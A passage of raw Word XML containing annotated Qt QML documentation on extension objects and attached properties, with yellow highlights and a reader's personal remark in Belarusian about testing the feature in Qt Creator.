      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pointer. However, the extension class creation is delayed until the first extended property is accessed. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The extension class is created and the target object is passed in as the parent.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the property on the original is accessed, the corresponding property on the extension object is used instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId240" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Extension Objects Example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demonstrates a usage of extension objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903609" w:rsidRPr="00653106" w:rsidRDefault="00903609" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903609">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Я гэта праверыў. Працуе. Але пашыраныя ўласцівасці падкрэсліваюцца чырвоным колерам у </w:t>
      </w:r>
      <w:r w:rsidRPr="00903609">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00903609">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00903609">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creator</w:t>
      </w:r>
      <w:r w:rsidRPr="00903609">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> і нельга пашырыць тып так, каб была бачна функцыянальнасць, створаная для канкрэтных рэвізій.</w:t>
      </w:r>
      <w:r w:rsidR="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidR="00653106" w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidR="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>зараз ужо не памятаю гэтай функцыянальнасці. Але кантэкст выкарыстання яе такі, што пакуль мне не патрэбны</w:t>
      </w:r>
      <w:r w:rsidR="00653106" w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00653106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="defining-qml-specific-types-and-attribut"/>
      <w:bookmarkStart w:id="285" w:name="_Toc483000592"/>
      <w:bookmarkStart w:id="286" w:name="_Toc483003612"/>
      <w:bookmarkStart w:id="287" w:name="_Toc483603945"/>
      <w:bookmarkStart w:id="288" w:name="_Toc483605165"/>
      <w:bookmarkEnd w:id="284"/>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Defining QML-Specific Types and Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
      <w:bookmarkEnd w:id="286"/>
      <w:bookmarkEnd w:id="287"/>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00653106">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="289" w:name="providing-attached-objects-for-data-anno"/>
      <w:bookmarkStart w:id="290" w:name="_Toc483000593"/>
      <w:bookmarkStart w:id="291" w:name="_Toc483003613"/>
      <w:bookmarkStart w:id="292" w:name="_Toc483603946"/>
      <w:bookmarkStart w:id="293" w:name="_Toc483605166"/>
      <w:bookmarkEnd w:id="289"/>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Providing Attached Objects for Data Annotations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
      <w:bookmarkEnd w:id="291"/>
      <w:bookmarkEnd w:id="292"/>
      <w:bookmarkEnd w:id="293"/>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In the QML language syntax, there is a notion of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId241" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00643AE4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached properties</w:t>
        </w:r>
        <w:r w:rsidRPr="00643AE4">
          <w:rPr>
            <w:rStyle w:val="apple-converted-space"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r w:rsidRPr="00643AE4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>and</w:t>
        </w:r>
        <w:r w:rsidRPr="00643AE4">
          <w:rPr>
            <w:rStyle w:val="apple-converted-space"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r w:rsidRPr="00643AE4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached signal handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which are additional attributes that are attached to an object. Essentially, such attributes are implemented and provided by an</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00643AE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and these attributes </w:t>
      </w:r>
      <w:r w:rsidRPr="00643AE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may be</w:t>
      </w:r>
      <w:r w:rsidRPr="00643AE4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00643AE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached</w:t>
      </w:r>
      <w:r w:rsidRPr="00643AE4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00643AE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to an object of another type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This contrasts with ordinary object properties which are provided by the object type itself (or the object's inherited type).</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For example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId242" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>below uses attached properties and attached handlers:</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import</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QtQuick</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2.0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Item</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width</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100</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height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100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focus</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true</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Keys</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enabled</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false</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Keys</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onReturnPressed</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Return key was pressed"</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Here, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId243" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object is able to access and set the values of</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Keys.enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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Keys.onReturnPressed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This allows the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId244" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to access these extra attributes as an extension to its own existing attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00653106">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="294" w:name="steps-for-implementing-attached-objects"/>
      <w:bookmarkStart w:id="295" w:name="_Toc483000594"/>
      <w:bookmarkStart w:id="296" w:name="_Toc483603947"/>
      <w:bookmarkStart w:id="297" w:name="_Toc483605167"/>
      <w:bookmarkEnd w:id="294"/>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Steps for Implementing Attached Objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
      <w:bookmarkEnd w:id="296"/>
      <w:bookmarkEnd w:id="297"/>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DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When considering the above example, there are several parties involved:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There is an instance of an </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0089092D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, with an</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>returnPressed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal, that has been attached to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId245" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
